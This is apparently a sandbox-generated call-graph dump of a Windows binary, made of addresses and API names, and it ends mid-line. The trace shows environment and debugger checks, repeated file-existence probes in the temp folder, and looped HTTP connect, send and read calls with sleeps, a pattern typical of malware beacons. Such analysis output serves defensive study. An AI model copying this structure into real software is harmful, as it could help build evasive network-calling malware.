2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36605->36606 36607 2ee7530 36606->36607 36607->36198 36608->36602 36610 2ee73ef 36610->36600 36708 2f11861 14 API calls _free 36611->36708 36615 2f09aaa 36612->36615 36614 2f09ac4 36614->36442 36615->36614 36617 2f09ac6 36615->36617 36632 2f120a9 36615->36632 36641 2f133e3 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 36615->36641 36618 2f09ad0 std::_Facet_Register 36617->36618 36619 2ee25c0 36617->36619 36642 2f0ad46 RaiseException 36618->36642 36639 2f0ad46 RaiseException 36619->36639 36622 2ee25dc 36640 2f0aaf1 26 API calls 2 library calls 36622->36640 36623 2f0a37e 36625 2ee2603 36625->36442 36626->36442 36645 2f0e9c4 25 API calls 3 library calls 36627->36645 36629 2f0ea47 36646 2f0ea55 IsProcessorFeaturePresent 36629->36646 36631 2f0ea54 36637 2f17e35 __Getctype 36632->36637 36633 2f17e73 36644 2f10c72 14 API calls _free 36633->36644 36635 2f17e5e RtlAllocateHeap 36636 2f17e71 36635->36636 36635->36637 36636->36615 36637->36633 36637->36635 36643 2f133e3 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 36637->36643 36639->36622 36640->36625 36641->36615 36642->36623 36643->36637 36644->36636 36645->36629 36647 2f0ea61 36646->36647 36650 2f0e87c 36647->36650 36651 2f0e898 __fread_nolock _unexpected 36650->36651 36652 2f0e8c4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 36651->36652 36655 2f0e995 _unexpected 36652->36655 36653 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36654 2f0e9b3 GetCurrentProcess TerminateProcess 36653->36654 36654->36631 36655->36653 36713 2f03e00 27 API calls 3 library calls 36656->36713 36658 2ee5dd1 36659 2ee6060 36658->36659 36714 2f03e00 27 API calls 3 library calls 36659->36714 36661 2ee61c6 36664 2ee51a0 36661->36664 36663 2ee6095 36663->36661 36715 2f0fdd0 40 API calls __Getctype 36663->36715 36665 2ee5432 36664->36665 36669 2ee5204 36664->36669 36665->36457 36667 2ee5355 36667->36665 36718 2f04f10 27 API calls 3 library calls 36667->36718 36669->36667 36716 2f0fdd0 40 API calls __Getctype 36669->36716 36717 2f04f10 27 API calls 3 library calls 36669->36717 36672 2f03f84 36671->36672 36673 2f03f5e _Yarn 36671->36673 36674 2f0406e 36672->36674 36677 2f03fd8 36672->36677 36678 2f03ffd 36672->36678 36673->36467 36719 2ee26a0 27 API calls 36674->36719 36676 2f04073 36720 2ee25c0 27 API calls 2 library calls 36676->36720 36677->36676 36681 2f09aa5 std::_Facet_Register 27 API calls 36677->36681 36682 2f09aa5 std::_Facet_Register 27 API calls 36678->36682 36684 2f03fe9 _Yarn 36678->36684 36680 2f04078 error_info_injector 36680->36467 36681->36684 36682->36684 36683 2f0ea38 25 API calls 36683->36674 36684->36683 36685 2f04050 error_info_injector 36684->36685 36685->36467 36687 2f115c2 36686->36687 36721 2f10cd1 36687->36721 36690->36513 36692 2f05473 36691->36692 36693 2f05600 36692->36693 36694 2f05540 36692->36694 36702 2f05478 _Yarn 36692->36702 36754 2ee26a0 27 API calls 36693->36754 36697 2f05575 36694->36697 36698 2f0559b 36694->36698 36696 2f05605 36755 2ee25c0 27 API calls 2 library calls 36696->36755 36697->36696 36700 2f05580 36697->36700 36704 2f09aa5 std::_Facet_Register 27 API calls 36698->36704 36706 2f0558d _Yarn 36698->36706 36703 2f09aa5 std::_Facet_Register 27 API calls 36700->36703 36701 2f05586 36705 2f0ea38 25 API calls 36701->36705 36701->36706 36702->36557 36703->36701 36704->36706 36707 2f0560f 36705->36707 36706->36557 36708->36610 36710->36539 36711->36561 36712->36581 36713->36658 36714->36663 36715->36663 36716->36669 36717->36669 36718->36667 36720->36680 36739 2f0fb57 36721->36739 36723 2f10d1c 36724 2f0dee7 __cftoe 37 API calls 36723->36724 36731 2f10d28 36724->36731 36725 2f10ce3 36725->36723 36726 2f10cf8 36725->36726 36738 2ee661c RegOpenKeyExA 36725->36738 36746 2f10c72 14 API calls _free 36726->36746 36728 2f10cfd 36747 2f0ea28 25 API calls ___std_exception_copy 36728->36747 36732 2f10d57 36731->36732 36748 2f11553 40 API calls 2 library calls 36731->36748 36735 2f10dc1 36732->36735 36749 2f114fc 25 API calls 2 library calls 36732->36749 36750 2f114fc 25 API calls 2 library calls 36735->36750 36736 2f10e87 36736->36738 36751 2f10c72 14 API calls _free 36736->36751 36738->36485 36738->36486 36740 2f0fb5c 36739->36740 36741 2f0fb6f 36739->36741 36752 2f10c72 14 API calls _free 36740->36752 36741->36725 36743 2f0fb61 36753 2f0ea28 25 API calls ___std_exception_copy 36743->36753 36745 2f0fb6c 36745->36725 36746->36728 36747->36738 36748->36731 36749->36735 36750->36736 36751->36738 36752->36743 36753->36745 36755->36701 36756->36213 36758 2f02f7e 36757->36758 36759 2f02fa1 error_info_injector 36757->36759 36758->36759 36760 2f0ea38 25 API calls 36758->36760 36759->36227 36761 2f02fec 36760->36761 36762->36238 36763->36244 36764->36248 36765->36255 36766->36259 36767->36252 36768->36256 36770->36220 36771->36222 36772->36231 36773->36235 36775 2ee7c4a 36774->36775 36789 2ee795f error_info_injector 36774->36789 36776 2ee7d12 36775->36776 36777 2ee7c73 36775->36777 37098 2f04450 27 API calls 36776->37098 36778 2f03f40 27 API calls 36777->36778 36785 2ee7c92 error_info_injector 36778->36785 36780 2ee7d17 36782 2f0ea38 25 API calls 36780->36782 36781 2f03f40 27 API calls 36781->36789 36783 2ee7d1c 36782->36783 36784 2ee7ce8 error_info_injector 36786 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36784->36786 36785->36780 36785->36784 36787 2ee7d0b 36786->36787 36787->36265 36789->36775 36789->36776 36789->36780 36789->36781 37097 2f05790 27 API calls _Yarn 36789->37097 37099 2f0b340 36790->37099 36792 2ee9436 GetVersionExW 36793 2ee9458 36792->36793 36813 2ee9588 error_info_injector 36792->36813 36795 2f03030 70 API calls 36793->36795 36794 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36796 2ee9a0d 36794->36796 36797 2ee9467 36795->36797 36796->36270 36798 2ee61f0 114 API calls 36797->36798 36799 2ee9472 36798->36799 36800 2f03030 70 API calls 36799->36800 36801 2ee9494 36800->36801 36802 2ee61f0 114 API calls 36801->36802 36803 2ee949f GetModuleHandleA GetProcAddress 36802->36803 36805 2ee94c5 error_info_injector 36803->36805 36806 2ee9546 error_info_injector 36805->36806 36809 2ee9a14 36805->36809 36807 2ee9577 GetSystemInfo 36806->36807 36808 2ee9573 GetNativeSystemInfo 36806->36808 36815 2ee957d 36807->36815 36808->36815 36810 2ee9a19 36809->36810 36811 2f0ea38 25 API calls 36809->36811 36812 2f0ea38 25 API calls 36810->36812 36811->36810 36814 2ee9a1e __fread_nolock 36812->36814 36813->36794 36818 2ee9a85 GetVersionExW 36814->36818 36815->36813 36816 2ee95df 36815->36816 36817 2ee96b9 36815->36817 36820 2f03030 70 API calls 36816->36820 36819 2f03030 70 API calls 36817->36819 36821 2ee9aad 36818->36821 36822 2ee9aa3 36818->36822 36823 2ee96e5 36819->36823 36825 2ee9600 36820->36825 36824 2f03030 70 API calls 36821->36824 36827 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36822->36827 36828 2ee61f0 114 API calls 36823->36828 36829 2ee9abc 36824->36829 36826 2ee61f0 114 API calls 36825->36826 36831 2ee9607 36826->36831 36832 2ee9c05 36827->36832 36833 2ee96ec 36828->36833 36830 2ee61f0 114 API calls 36829->36830 36834 2ee9ac7 36830->36834 36835 2f03030 70 API calls 36831->36835 36832->36270 36836 2f03030 70 API calls 36833->36836 36839 2f03030 70 API calls 36834->36839 36837 2ee961f 36835->36837 36838 2ee9704 36836->36838 36840 2ee61f0 114 API calls 36837->36840 36841 2ee61f0 114 API calls 36838->36841 36842 2ee9ae9 36839->36842 36847 2ee9626 36840->36847 36843 2ee970b 36841->36843 36844 2ee61f0 114 API calls 36842->36844 36848 2f03030 70 API calls 36843->36848 36845 2ee9af4 GetModuleHandleA GetProcAddress 36844->36845 36851 2ee9b1a error_info_injector 36845->36851 37101 2f1189f 40 API calls 36847->37101 36850 2ee973c 36848->36850 36852 2ee61f0 114 API calls 36850->36852 36855 2ee9c0c 36851->36855 36858 2ee9b97 error_info_injector 36851->36858 36853 2ee9743 36852->36853 37102 2ee91b0 123 API calls 3 library calls 36853->37102 36854 2ee9bc8 GetSystemInfo 36854->36822 36859 2f0ea38 25 API calls 36855->36859 36856 2ee9651 36856->36810 36856->36813 36858->36822 36858->36854 36861 2ee9c11 36859->36861 36860 2ee9752 36862 2f03030 70 API calls 36860->36862 36863 2ee978d 36862->36863 36864 2ee61f0 114 API calls 36863->36864 36865 2ee9794 36864->36865 36866 2f03030 70 API calls 36865->36866 36867 2ee97ac 36866->36867 36868 2ee61f0 114 API calls 36867->36868 36869 2ee97b3 36868->36869 36870 2f03030 70 API calls 36869->36870 36871 2ee97e4 36870->36871 36872 2ee61f0 114 API calls 36871->36872 36873 2ee97eb 36872->36873 37103 2ee91b0 123 API calls 3 library calls 36873->37103 36875 2ee97fa 36876 2f03030 70 API calls 36875->36876 36877 2ee9835 36876->36877 36878 2ee61f0 114 API calls 36877->36878 36879 2ee983c 36878->36879 36880 2f03030 70 API calls 36879->36880 36881 2ee9854 36880->36881 36882 2ee61f0 114 API calls 36881->36882 36883 2ee985b 36882->36883 36884 2f03030 70 API calls 36883->36884 36885 2ee988c 36884->36885 36886 2ee61f0 114 API calls 36885->36886 36887 2ee9893 36886->36887 37104 2ee91b0 123 API calls 3 library calls 36887->37104 36889 2ee98a2 36890 2f03030 70 API calls 36889->36890 36891 2ee98dd 36890->36891 36892 2ee61f0 114 API calls 36891->36892 36893 2ee98e4 36892->36893 36894 2f03030 70 API calls 36893->36894 36895 2ee98fc 36894->36895 36896 2ee61f0 114 API calls 36895->36896 36897 2ee9903 36896->36897 36898 2f03030 70 API calls 36897->36898 36899 2ee9934 36898->36899 36900 2ee61f0 114 API calls 36899->36900 36901 2ee993b 36900->36901 37105 2ee91b0 123 API calls 3 library calls 36901->37105 36903 2ee994a 36903->36813 36905 2ee4404 36904->36905 36906 2ee447d 36905->36906 36907 2f03f40 27 API calls 36905->36907 36908 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36906->36908 36907->36906 36909 2ee448c 36908->36909 36910 2ee9a20 36909->36910 36911 2f0b340 __fread_nolock 36910->36911 36912 2ee9a85 GetVersionExW 36911->36912 36913 2ee9aad 36912->36913 36914 2ee9aa3 36912->36914 36915 2f03030 70 API calls 36913->36915 36916 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36914->36916 36917 2ee9abc 36915->36917 36919 2ee9c05 36916->36919 36918 2ee61f0 114 API calls 36917->36918 36920 2ee9ac7 36918->36920 36919->36277 36921 2f03030 70 API calls 36920->36921 36922 2ee9ae9 36921->36922 36923 2ee61f0 114 API calls 36922->36923 36924 2ee9af4 36923->36924 36925 2ee9aff GetModuleHandleA GetProcAddress 36924->36925 36926 2ee9afd 36924->36926 36927 2ee9b1a error_info_injector 36925->36927 36926->36925 36928 2ee9b97 error_info_injector 36927->36928 36930 2ee9c0c 36927->36930 36929 2ee9bc8 GetSystemInfo 36928->36929 36933 2ee9bc4 36928->36933 36929->36933 36931 2f0ea38 25 API calls 36930->36931 36932 2ee9c11 36931->36932 36933->36914 36935 2eeb2e0 36934->36935 36935->36935 36936 2eeb4ab 36935->36936 36937 2eeb331 36935->36937 36943 2eeb2f4 _Yarn 36935->36943 37121 2ee26a0 27 API calls 36936->37121 37120 2f053d0 27 API calls std::_Facet_Register 36937->37120 36939 2eeb4b0 36942 2f0ea38 25 API calls 36939->36942 36944 2eeb4b5 36942->36944 37106 2f02d00 36943->37106 36945 2eeb483 error_info_injector 36946 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 36945->36946 36947 2eeb4a7 36946->36947 36949 2eeb700 36947->36949 36948 2eeb3e7 36948->36939 36948->36945 36950 2f03030 70 API calls 36949->36950 36951 2eeb742 36950->36951 36952 2ee61f0 114 API calls 36951->36952 36953 2eeb74a 36952->36953 37124 2eea270 GetTempPathA 36953->37124 36956 2f05430 27 API calls 36957 2eeb76f GetFileAttributesA 36956->36957 36958 2eeb788 error_info_injector 36957->36958 36959 2eec689 36958->36959 36960 2eeb853 error_info_injector 36958->36960 36961 2f0ea38 25 API calls 36959->36961 36963 2f03030 70 API calls 36960->36963 37073 2eeb861 36960->37073 36962 2eec6c5 36961->36962 36965 2eeb87c 36963->36965 36964 2f03f40 27 API calls 36967 2eec675 GetModuleFileNameA 36964->36967 36966 2ee61f0 114 API calls 36965->36966 36968 2eeb884 36966->36968 36967->36297 36969 2eea270 115 API calls 36968->36969 36970 2eeb898 36969->36970 36971 2f05430 27 API calls 36970->36971 36972 2eeb8a9 GetFileAttributesA 36971->36972 36973 2eeb8c2 error_info_injector 36972->36973 36974 2f03030 70 API calls 36973->36974 36973->37073 36975 2eeb9b6 36974->36975 36976 2ee61f0 114 API calls 36975->36976 36977 2eeb9be 36976->36977 36978 2eea270 115 API calls 36977->36978 36979 2eeb9d2 36978->36979 36980 2f05430 27 API calls 36979->36980 36981 2eeb9e3 GetFileAttributesA 36980->36981 36982 2eeb9fc error_info_injector 36981->36982 36983 2f03030 70 API calls 36982->36983 36982->37073 36984 2eebaf0 36983->36984 36985 2ee61f0 114 API calls 36984->36985 36986 2eebaf8 36985->36986 36987 2eea270 115 API calls 36986->36987 36988 2eebb0c 36987->36988 36989 2f05430 27 API calls 36988->36989 36990 2eebb1d GetFileAttributesA 36989->36990 36991 2eebb36 error_info_injector 36990->36991 36992 2f03030 70 API calls 36991->36992 36991->37073 36993 2eebc2a 36992->36993 36994 2ee61f0 114 API calls 36993->36994 36995 2eebc32 36994->36995 36996 2eea270 115 API calls 36995->36996 36997 2eebc46 36996->36997 36998 2f05430 27 API calls 36997->36998 36999 2eebc57 GetFileAttributesA 36998->36999 37000 2eebc70 error_info_injector 36999->37000 37001 2f03030 70 API calls 37000->37001 37000->37073 37002 2eebd64 37001->37002 37003 2ee61f0 114 API calls 37002->37003 37004 2eebd6c 37003->37004 37005 2eea270 115 API calls 37004->37005 37006 2eebd80 37005->37006 37007 2f05430 27 API calls 37006->37007 37008 2eebd91 GetFileAttributesA 37007->37008 37009 2eebdaa error_info_injector 37008->37009 37010 2f03030 70 API calls 37009->37010 37009->37073 37011 2eebe9e 37010->37011 37012 2ee61f0 114 API calls 37011->37012 37013 2eebea6 37012->37013 37014 2eea270 115 API calls 37013->37014 37015 2eebeba 37014->37015 37016 2f05430 27 API calls 37015->37016 37017 2eebecb GetFileAttributesA 37016->37017 37018 2eebee4 error_info_injector 37017->37018 37019 2f03030 70 API calls 37018->37019 37018->37073 37020 2eebfd8 37019->37020 37021 2ee61f0 114 API calls 37020->37021 37022 2eebfe0 37021->37022 37023 2eea270 115 API calls 37022->37023 37024 2eebff4 37023->37024 37025 2f05430 27 API calls 37024->37025 37026 2eec005 GetFileAttributesA 37025->37026 37027 2eec01e error_info_injector 37026->37027 37028 2f03030 70 API calls 37027->37028 37027->37073 37029 2eec112 37028->37029 37030 2ee61f0 114 API calls 37029->37030 37031 2eec11a 37030->37031 37032 2eea270 115 API calls 37031->37032 37033 2eec12e 37032->37033 37034 2f05430 27 API calls 37033->37034 37035 2eec13f GetFileAttributesA 37034->37035 37036 2eec158 error_info_injector 37035->37036 37037 2f03030 70 API calls 37036->37037 37036->37073 37038 2eec24c 37037->37038 37039 2ee61f0 114 API calls 37038->37039 37040 2eec254 37039->37040 37041 2eea270 115 API calls 37040->37041 37042 2eec268 37041->37042 37043 2f05430 27 API calls 37042->37043 37044 2eec279 GetFileAttributesA 37043->37044 37045 2eec292 error_info_injector 37044->37045 37046 2f03030 70 API calls 37045->37046 37045->37073 37047 2eec386 37046->37047 37048 2ee61f0 114 API calls 37047->37048 37049 2eec38e 37048->37049 37050 2eea270 115 API calls 37049->37050 37051 2eec3a2 37050->37051 37052 2f05430 27 API calls 37051->37052 37053 2eec3b3 GetFileAttributesA 37052->37053 37055 2eec3cc error_info_injector 37053->37055 37054 2f03030 70 API calls 37056 2eec4c0 37054->37056 37055->37054 37055->37073 37057 2ee61f0 114 API calls 37056->37057 37058 2eec4cb 37057->37058 37059 2eea270 115 API calls 37058->37059 37060 2eec4e2 37059->37060 37061 2f05430 27 API calls 37060->37061 37062 2eec4f3 GetFileAttributesA 37061->37062 37064 2eec50c error_info_injector 37062->37064 37063 2ee93d0 132 API calls 37065 2eec61a 37063->37065 37064->37063 37064->37073 37066 2ee93d0 132 API calls 37065->37066 37065->37073 37067 2eec624 37066->37067 37068 2ee93d0 132 API calls 37067->37068 37067->37073 37069 2eec62e 37068->37069 37070 2ee93d0 132 API calls 37069->37070 37069->37073 37071 2eec638 37070->37071 37072 2ee93d0 132 API calls 37071->37072 37071->37073 37072->37073 37073->36964 37075 2ee9e46 37074->37075 37077 2ee9e93 37075->37077 37079 2ee9e78 error_info_injector 37075->37079 37076 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 37078 2ee9e8f 37076->37078 37080 2f0ea38 25 API calls 37077->37080 37078->36302 37079->37076 37081 2ee9e98 37080->37081 37083 2f045f9 37082->37083 37085 2f0460d _Yarn 37083->37085 37141 2f051b0 27 API calls 3 library calls 37083->37141 37085->36359 37087 2f03f40 27 API calls 37086->37087 37088 2ee4db3 37087->37088 37089 2f03f40 27 API calls 37088->37089 37090 2ee4dcc 37089->37090 37142 2ee4a40 27 API calls 3 library calls 37090->37142 37092 2ee4e59 error_info_injector 37093 2ee4ec1 error_info_injector 37092->37093 37094 2f0ea38 25 API calls 37092->37094 37093->36417 37095 2ee4ee4 37094->37095 37096->36420 37097->36789 37100 2f0b357 37099->37100 37100->36792 37100->37100 37101->36856 37102->36860 37103->36875 37104->36889 37105->36903 37109 2f02d1b 37106->37109 37116 2f02e04 _Yarn error_info_injector 37106->37116 37107 2f02d9b _Yarn 37107->37116 37119 2f0ea38 25 API calls 37107->37119 37108 2f02e91 37122 2ee26a0 27 API calls 37108->37122 37109->37107 37109->37108 37112 2f02db1 37109->37112 37113 2f02d8a 37109->37113 37109->37116 37111 2f02e96 37123 2ee25c0 27 API calls 2 library calls 37111->37123 37112->37107 37118 2f09aa5 std::_Facet_Register 27 API calls 37112->37118 37113->37111 37117 2f09aa5 std::_Facet_Register 27 API calls 37113->37117 37115 2f02e9b 37116->36948 37117->37107 37118->37107 37119->37108 37120->36943 37123->37115 37125 2f03030 70 API calls 37124->37125 37126 2eea2cc 37125->37126 37127 2ee61f0 114 API calls 37126->37127 37128 2eea2d7 37127->37128 37129 2f03f40 27 API calls 37128->37129 37130 2eea32d 37129->37130 37131 2f03f40 27 API calls 37130->37131 37132 2eea389 37131->37132 37133 2f05430 27 API calls 37132->37133 37140 2eea3a2 error_info_injector 37133->37140 37134 2eea465 37137 2f0ea38 25 API calls 37134->37137 37135 2eea43e error_info_injector 37136 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 37135->37136 37138 2eea461 37136->37138 37139 2eea46a 37137->37139 37138->36956 37140->37134 37140->37135 37141->37085 37142->37092 37145 2f008d0 37143->37145 37144 2f03030 70 API calls 37144->37145 37145->37144 37146 2ee61f0 114 API calls 37145->37146 37161 2efe850 37145->37161 37146->37145 37148 2f0091c Sleep 37148->37145 37152 2f00960 37149->37152 37150 2f03030 70 API calls 37150->37152 37151 2ee61f0 114 API calls 37151->37152 37152->37150 37152->37151 37153 2efe850 121 API calls 37152->37153 37154 2f009ac Sleep 37153->37154 37154->37152 37158 2f009f0 37155->37158 37156 2f03030 70 API calls 37156->37158 37157 2ee61f0 114 API calls 37157->37158 37158->37156 37158->37157 37159 2efe850 121 API calls 37158->37159 37160 2f00a3c Sleep 37159->37160 37160->37158 37162 2efe88c 37161->37162 37163 2efef7e error_info_injector 37161->37163 37162->37163 37164 2f03030 70 API calls 37162->37164 37165 2efeff4 error_info_injector 37163->37165 37167 2eff051 37163->37167 37168 2efe8ad 37164->37168 37166 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 37165->37166 37169 2eff016 37166->37169 37171 2f0ea38 25 API calls 37167->37171 37170 2ee61f0 114 API calls 37168->37170 37169->37148 37173 2efe8b4 37170->37173 37172 2eff056 37171->37172 37174 2f03030 70 API calls 37173->37174 37175 2efe8c6 37174->37175 37176 2f03030 70 API calls 37175->37176 37177 2efe8d8 37176->37177 37283 2ef0370 37177->37283 37180 2f03030 70 API calls 37181 2efe8f9 37180->37181 37182 2f03030 70 API calls 37181->37182 37183 2efe911 37182->37183 37184 2ee61f0 114 API calls 37183->37184 37185 2efe918 37184->37185 37314 2ee9c20 37185->37314 37188 2f03030 70 API calls 37190 2efebcb 37188->37190 37189 2f03030 70 API calls 37191 2efe940 37189->37191 37192 2f03030 70 API calls 37190->37192 37193 2f03030 70 API calls 37191->37193 37194 2efebe0 37192->37194 37195 2efe958 37193->37195 37196 2f03030 70 API calls 37194->37196 37197 2ee61f0 114 API calls 37195->37197 37199 2efebf2 37196->37199 37198 2efe95f 37197->37198 37200 2ee9c20 27 API calls 37198->37200 37201 2ef0370 121 API calls 37199->37201 37202 2efe96b 37200->37202 37203 2efebfe 37201->37203 37205 2f03030 70 API calls 37202->37205 37265 2efeb99 37202->37265 37204 2f03030 70 API calls 37203->37204 37206 2efec13 37204->37206 37207 2efe988 37205->37207 37208 2f03030 70 API calls 37206->37208 37209 2ee61f0 114 API calls 37207->37209 37210 2efec2b 37208->37210 37214 2efe990 37209->37214 37211 2ee61f0 114 API calls 37210->37211 37212 2efec32 37211->37212 37213 2ee9c20 27 API calls 37212->37213 37215 2efec3e 37213->37215 37217 2f03f40 27 API calls 37214->37217 37216 2f03030 70 API calls 37215->37216 37220 2efef0b error_info_injector 37215->37220 37218 2efec5a 37216->37218 37219 2efe9fe 37217->37219 37221 2f03030 70 API calls 37218->37221 37223 2f02f70 25 API calls 37219->37223 37220->37163 37222 2eff04c 37220->37222 37224 2efec72 37221->37224 37225 2f0ea38 25 API calls 37222->37225 37231 2efea0a error_info_injector 37223->37231 37226 2ee61f0 114 API calls 37224->37226 37225->37167 37227 2efec79 37226->37227 37228 2ee9c20 27 API calls 37227->37228 37230 2efec85 37228->37230 37229 2f03030 70 API calls 37232 2efea85 37229->37232 37230->37220 37234 2f03030 70 API calls 37230->37234 37231->37229 37233 2ee61f0 114 API calls 37232->37233 37237 2efea8d 37233->37237 37235 2efeca2 37234->37235 37236 2ee61f0 114 API calls 37235->37236 37240 2efecaa 37236->37240 37238 2f03f40 27 API calls 37237->37238 37239 2efeaeb 37238->37239 37241 2f02f70 25 API calls 37239->37241 37242 2efecfb 37240->37242 37243 2eff033 37240->37243 37248 2efeaf7 error_info_injector 37241->37248 37244 2f03f40 27 API calls 37242->37244 37329 2f04450 27 API calls 37243->37329 37246 2efed18 37244->37246 37249 2f02f70 25 API calls 37246->37249 37247 2eff038 37330 2f0838c 27 API calls 2 library calls 37247->37330 37248->37265 37326 2eeb5f0 114 API calls 3 library calls 37248->37326 37259 2efed24 error_info_injector 37249->37259 37252 2eff042 37254 2f0ea38 25 API calls 37252->37254 37253 2efeb71 37253->37265 37327 2f10c72 14 API calls _free 37253->37327 37255 2eff047 37254->37255 37260 2f0ea38 25 API calls 37255->37260 37256 2efed86 error_info_injector 37257 2f03030 70 API calls 37256->37257 37261 2efed9f 37257->37261 37259->37252 37259->37256 37260->37222 37263 2ee61f0 114 API calls 37261->37263 37262 2efeb7a 37264 2f115a7 40 API calls 37262->37264 37266 2efeda7 37263->37266 37264->37265 37265->37188 37265->37247 37267 2f03f40 27 API calls 37266->37267 37268 2efee05 37267->37268 37269 2f02f70 25 API calls 37268->37269 37271 2efee11 error_info_injector 37269->37271 37270 2efee73 error_info_injector 37272 2f03030 70 API calls 37270->37272 37271->37255 37271->37270 37273 2efee8e 37272->37273 37274 2f03030 70 API calls 37273->37274 37275 2efeea3 37274->37275 37276 2f03030 70 API calls 37275->37276 37277 2efeebe 37276->37277 37278 2ee61f0 114 API calls 37277->37278 37279 2efeec5 37278->37279 37280 2f03f40 27 API calls 37279->37280 37281 2efef02 37280->37281 37328 2efe420 114 API calls 2 library calls 37281->37328 37284 2ef07c7 37283->37284 37285 2ef03c2 37283->37285 37286 2f03f40 27 API calls 37284->37286 37285->37284 37287 2ef03d6 Sleep InternetOpenW InternetConnectA 37285->37287 37292 2ef0774 error_info_injector 37286->37292 37288 2f03030 70 API calls 37287->37288 37289 2ef0462 37288->37289 37290 2ee61f0 114 API calls 37289->37290 37294 2ef046d HttpOpenRequestA 37290->37294 37291 2ef089b 37295 2f0ea38 25 API calls 37291->37295 37292->37291 37296 2ef07c2 error_info_injector 37292->37296 37293 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 37297 2ef0888 37293->37297 37302 2ef0496 error_info_injector 37294->37302 37299 2ef08a0 37295->37299 37296->37293 37297->37180 37300 2f03030 70 API calls 37301 2ef04fe 37300->37301 37303 2ee61f0 114 API calls 37301->37303 37302->37300 37304 2ef0509 37303->37304 37305 2f03030 70 API calls 37304->37305 37306 2ef0522 37305->37306 37307 2ee61f0 114 API calls 37306->37307 37308 2ef052d HttpSendRequestA 37307->37308 37310 2ef0550 error_info_injector 37308->37310 37311 2ef05d8 InternetReadFile 37310->37311 37312 2ef05ff _Yarn 37311->37312 37313 2ef067f InternetReadFile 37312->37313 37313->37312 37319 2ee9d43 error_info_injector 37314->37319 37325 2ee9c7c error_info_injector 37314->37325 37315 2ee9e0a 37331 2f04450 27 API calls 37315->37331 37316 2f03f40 27 API calls 37316->37325 37318 2ee9e0f 37322 2f0ea38 25 API calls 37318->37322 37319->37318 37320 2ee9de3 error_info_injector 37319->37320 37321 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 37320->37321 37324 2ee9e06 37321->37324 37323 2ee9e14 37322->37323 37324->37189 37324->37265 37325->37315 37325->37316 37325->37318 37325->37319 37326->37253 37327->37262 37328->37220 37332 2f19ffd 37333 2f1a1a0 37332->37333 37335 2f1a027 37332->37335 37383 2f10c72 14 API calls _free 37333->37383 37335->37333 37338 2f1a072 37335->37338 37336 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 37337 2f1a1bd 37336->37337 37353 2f1e952 37338->37353 37342 2f1a0a6 37343 2f1a1bf 37342->37343 37368 2f1e037 37342->37368 37345 2f0ea55 __Getctype 11 API calls 37343->37345 37347 2f1a1cb 37345->37347 37346 2f1a0b8 37346->37343 37375 2f1e063 37346->37375 37349 2f1a0ca 37349->37343 37350 2f1a0d3 37349->37350 37351 2f1a18b 37350->37351 37382 2f1e9af 25 API calls 2 library calls 37350->37382 37351->37336 37355 2f1e95e ___scrt_is_nonwritable_in_current_image 37353->37355 37354 2f1a092 37361 2f1e00b 37354->37361 37355->37354 37384 2f12100 EnterCriticalSection 37355->37384 37357 2f1e96f 37358 2f1e983 37357->37358 37385 2f1e82b 37357->37385 37403 2f1e9a6 LeaveCriticalSection std::_Lockit::~_Lockit 37358->37403 37362 2f1e017 37361->37362 37363 2f1e02c 37361->37363 37512 2f10c72 14 API calls _free 37362->37512 37363->37342 37365 2f1e01c 37513 2f0ea28 25 API calls ___std_exception_copy 37365->37513 37367 2f1e027 37367->37342 37369 2f1e043 37368->37369 37370 2f1e058 37368->37370 37514 2f10c72 14 API calls _free 37369->37514 37370->37346 37372 2f1e048 37515 2f0ea28 25 API calls ___std_exception_copy 37372->37515 37374 2f1e053 37374->37346 37376 2f1e084 37375->37376 37377 2f1e06f 37375->37377 37376->37349 37516 2f10c72 14 API calls _free 37377->37516 37379 2f1e074 37517 2f0ea28 25 API calls ___std_exception_copy 37379->37517 37381 2f1e07f 37381->37349 37382->37351 37383->37351 37384->37357 37387 2f1e877 37385->37387 37386 2f1e87e 37388 2f1e8f5 37386->37388 37390 2f1e8ec 37386->37390 37387->37386 37499 2f17e35 15 API calls 3 library calls 37387->37499 37462 2f1e6d1 37388->37462 37404 2f1e430 37390->37404 37392 2f1e89d 37398 2f1e8a4 37392->37398 37399 2f1e8cc 37392->37399 37394 2f1e8f2 37395 2f17c06 _free 14 API calls 37394->37395 37396 2f1e900 37395->37396 37400 2f096b0 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 37396->37400 37397 2f17c06 _free 14 API calls 37397->37386 37398->37397 37401 2f17c06 _free 14 API calls 37399->37401 37402 2f1e90e 37400->37402 37401->37386 37402->37358 37403->37354 37405 2f1e440 37404->37405 37406 2f1e063 25 API calls 37405->37406 37407 2f1e45f 37406->37407 37408 2f1e6c4 37407->37408 37409 2f1e00b 25 API calls 37407->37409 37410 2f0ea55 __Getctype 11 API calls 37408->37410 37412 2f1e471 37409->37412 37411 2f1e6d0 37410->37411 37415 2f1e063 25 API calls 37411->37415 37412->37408 37416 2f1e6be 37412->37416 37500 2f17e35 15 API calls 3 library calls 37412->37500 37414 2f1e4dc 37417 2f1e6b8 37414->37417 37419 2f17c06 _free 14 API calls 37414->37419 37418 2f1e6fe 37415->37418 37416->37394 37421 2f17c06 _free 14 API calls 37417->37421 37420 2f1e820 37418->37420 37423 